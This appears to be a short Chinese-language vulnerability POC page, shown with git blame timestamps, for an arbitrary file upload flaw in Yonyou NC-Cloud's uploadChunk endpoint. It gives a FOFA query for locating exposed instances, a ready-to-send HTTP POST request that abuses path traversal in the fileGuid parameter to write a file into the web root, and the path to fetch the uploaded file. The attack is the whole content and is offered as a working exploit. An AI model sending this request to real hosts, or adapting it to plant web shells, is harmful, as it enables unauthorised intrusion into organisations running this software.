2023-10-21 10:42:15 +08:00
|
|
|
## 用友NC-Cloud uploadChunk 任意文件上传漏洞
|
|
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
|
```
|
|
|
|
|
app="用友-NC-Cloud"
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## POC
|
2023-11-24 19:49:58 +08:00
|
|
|
|
2023-10-21 10:42:15 +08:00
|
|
|
```
|
|
|
|
|
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
2023-11-24 19:49:58 +08:00
|
|
|
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
|
|
|
|
|
|
|
|
|
|
--024ff46f71634a1c9bf8ec5820c26fa9--
|
2023-10-21 10:42:15 +08:00
|
|
|
Content-Disposition: form-data; name="file"; filename="test.txt"
|
2023-11-24 19:49:58 +08:00
|
|
|
|
|
|
|
|
1123213
|
2023-10-21 10:42:15 +08:00
|
|
|
--024ff46f71634a1c9bf8ec5820c26fa9--
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
文件上传路径访问
|
|
|
|
|
/nccloud/test.txt
|
